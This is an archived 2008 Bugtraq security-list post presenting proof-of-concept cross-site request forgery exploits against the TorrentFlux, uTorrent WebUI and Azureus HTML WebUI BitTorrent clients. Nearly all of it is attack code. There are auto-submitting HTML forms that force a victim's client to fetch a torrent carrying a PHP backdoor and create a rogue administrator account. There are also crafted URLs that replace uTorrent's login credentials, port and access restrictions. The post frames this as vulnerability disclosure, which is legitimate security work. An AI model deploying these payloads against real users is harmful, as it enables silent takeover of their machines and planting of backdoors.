BitTorrent Clients and CSRF

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: BitTorrent Clients and CSRF
From: th3.r00k.nospam@xxxxxxxxxxxxxx
Date: 18 Apr 2008 08:33:51 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

The following are proof of concept exploits against three bittorrent clients.  
uTorrent' WebUI, Azurues's "HTML WebUI", and TorrentFlux.

More information:
http://www.rooksecurity.com/blog/?p=10

TorrentFlux v2.3(Latest)
http://sourceforge.net/projects/torrentflux/

If you force TorrentFlux to download a torrent that contains a file 
backdoor.php you will be able to execute it by browsing here:
http://localhost/torrentflux_2.3/html/downloads/USER_NAME/
You do not have to know a password to access this folder, but you will have to 
know the username.
<html>
<form id='file_attack' method="post" 
action="http://localhost/torrentflux_2.3/html/index.php";>
<input type=hidden name="url_upload" 
value="http://localhost/backdoor.php.torrent";>
<input type=submit value='file attack'>
</from>
<html>
<script>
document.getElementById('file_attack').submit();
</script>

<html>
Add an admistrative account:
<form id=?create_admin? method=?post? 
action=?http://localhost/torrentflux_2.3/html/admin.php?op=addUser?>
<input type=hidden name=?newUser? value=?sadmin?>
<input type=hidden name=?pass1&#8243; value=?password?>
<input type=hidden name=?pass2&#8243; value=?password?>
<input type=hidden name=?userType? value=1>
<input type=submit value=?create admin?>
</form>
</html>
<script>
document.getElementById(?create_admin?).submit();
</script>

uTorrent?s WebUI is also affected:
http://forum.utorrent.com/viewtopic.php?id=14565
force file download:
http://127.0.0.1:8080/gui/?action=add-url&s=http://localhost/backdoor.torrent

utorrent change administrative login information:
http://127.0.0.1:8080/gui/?action=setsetting&s=webui.username&v=badmin
http://127.0.0.1:8080/gui/?action=setsetting&s=webui.password&v=badmin
http://127.0.0.1:8080/gui/?action=setsetting&s=webui.port&v=4096
After the username or password have been changed then the browser must 
re-authenticate.
http://127.0.0.1:8080/gui/?action=setsetting&s=webui.restrict&v=127.0.0.1/24,10.1.1.1
So is Azurues?s HTML WebUI:
Force file download:
http://127.0.0.1:6886/index.tmpl?d=u&upurl=http://localhost/backdoor.torrent

Prev by Date: [ MDVSA-2008:089 ] - Updated poppler packages fix vulnerability
Next by Date: [ GLSA 200804-20 ] Sun JDK/JRE: Multiple vulnerabilities
Previous by thread: [ MDVSA-2008:089 ] - Updated poppler packages fix vulnerability
Next by thread: [ GLSA 200804-20 ] Sun JDK/JRE: Multiple vulnerabilities
Index(es):
- Date
- Thread